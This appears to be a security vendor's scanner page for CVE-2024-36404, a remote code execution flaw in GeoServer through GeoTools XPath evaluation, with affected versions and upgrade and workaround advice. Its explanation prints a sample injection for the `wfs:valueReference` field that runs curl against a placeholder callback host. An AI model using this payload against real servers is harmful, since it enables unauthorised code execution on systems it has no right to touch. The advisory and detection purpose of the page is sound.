S4E just found a high-severity finding from top 10 tcp port service scan
PlatformPlansPartners
Resources
ToolsBlogDocs
Sign Up →
critical·Product Based Web Vulnerabilities·Updated Dec 25, 2024

CVE-2024-36404 Scanner

CVE-2024-36404 Scanner - Remote Code Execution vulnerability in GeoServer

Est. Time~10 seconds
Scan TypeSingle Scan
Targetsdomain, ipv4, subdomain
CostFree
3.2k
Times Used
continuous scan runs
4.7k
Continuously Checked
assets under CS
2
Vulnerabilities Found
confirmed findings
References
CVECVE-2024-36404
9.8
CVSScritical
Exploitable remotely over the internet · no authentication required.

GeoTools is an open source Java library that provides tools for geospatial data. Prior to versions 31.2, 30.4, and 29.6, Remote Code Execution (RCE) is possible if an application uses certain GeoTools functionality to evaluate XPath expressions supplied by user input. Versions 31.2, 30.4, and 29.6 contain a fix for this issue. As a workaround, GeoTools can operate with reduced functionality by removing the `gt-complex` jar from one's application. As an example of the impact, application schema `datastore` would not function without the ability to use XPath expressions to query complex content. Alternatively, one may utilize a drop-in replacement GeoTools jar from SourceForge for versions 31.1, 30.3, 30.2, 29.2, 28.2, 27.5, 27.4, 26.7, 26.4, 25.2, and 24.0. These jars are for download only and are not available from maven central, intended to quickly provide a fix to affected applications.

Attack Vector
Network
Privileges Req.
None
User Interaction
None
Affected
geotoolsby geotools
< 29.6
geotoolsby geotools
AFFECTED< 29.6SAFE ✓≥ 29.6
geotoolsby geotools
AFFECTED< 30.4SAFE ✓≥ 30.4
geotoolsby geotools
AFFECTED< 31.2SAFE ✓≥ 31.2
Updated Aug 22, 2026View on NVD →
Detail

GeoServer is an open-source server for sharing geospatial data across multiple platforms. It is widely used by GIS professionals for visualizing and editing geospatial data in both desktop and web applications. The server supports various spatial data formats and provides WMS, WFS, and other services to facilitate the sharing of geospatial data. GeoServer is deployed in a wide range of environments from governmental to commercial sectors, and it integrates seamlessly with tools like GeoTools for geospatial analysis. A critical vulnerability exists in GeoServer when used in conjunction with GeoTools versions prior to 31.2, 30.4, and 29.6. This flaw exposes GeoServer to remote code execution risks when certain functionality within GeoTools is exploited.

The vulnerability is a Remote Code Execution (RCE) flaw that arises when GeoServer evaluates XPath expressions supplied by user input. This issue is specifically associated with GeoTools versions prior to 31.2, 30.4, and 29.6. The flaw allows an attacker to execute arbitrary Java code on the server by injecting a malicious payload through specific GeoTools functionality. This can result in severe security risks, including the unauthorized execution of commands or code, which could potentially compromise the integrity of the entire server environment. The vulnerability can be mitigated by updating to the fixed versions or applying workarounds that limit GeoTools functionality. However, older versions without the fix remain vulnerable and should be updated immediately to prevent exploitation.

The vulnerability is triggered when GeoServer, relying on GeoTools for XPath evaluation, processes user-controlled input. This input, which could come from a WFS request, includes a parameter that forces GeoServer to execute arbitrary Java code. The attacker injects a payload into the `wfs:valueReference` field of the WFS request. In particular, an attacker can pass a command like `exec(java.lang.Runtime.getRuntime(),'curl {{interactsh-url}}')` to execute remote code. This vulnerability specifically impacts configurations where GeoServer is paired with vulnerable GeoTools versions and allows attackers to take advantage of unsanitized input handling, triggering RCE.

Exploiting this vulnerability can lead to complete server compromise. An attacker could remotely execute arbitrary code, allowing them to alter server configurations, access sensitive data, or launch further attacks within the network. Malicious actors may exploit this flaw to deploy malware, manipulate geospatial data, or control other systems connected to the compromised GeoServer. Such exploitation can disrupt services, lead to data loss, and pose significant risks to the organization's infrastructure and data integrity. If not patched, the vulnerability could allow an attacker to persistently maintain access, making it a critical security concern.

REFERENCES

Solution Advice
  • Upgrade GeoTools to version 31.2, 30.4, or 29.6 or higher.
  • If upgrading is not immediately possible, remove the `gt-complex` jar from the application as a workaround.
  • As an alternative, use the drop-in replacement GeoTools jars from SourceForge for versions 31.1, 30.3, 30.2, 29.2, 28.2, 27.5, 27.4, 26.7, 26.4, 25.2, and 24.0.
  • Ensure proper input sanitization in applications that use GeoTools and GeoServer to mitigate similar issues in the future.

Get AI-powered remediation steps tailored to your asset.

Try AI Solutions →

Check your infrastructure.
Right now.

11,000+ scanners. Free to start. No credit card required.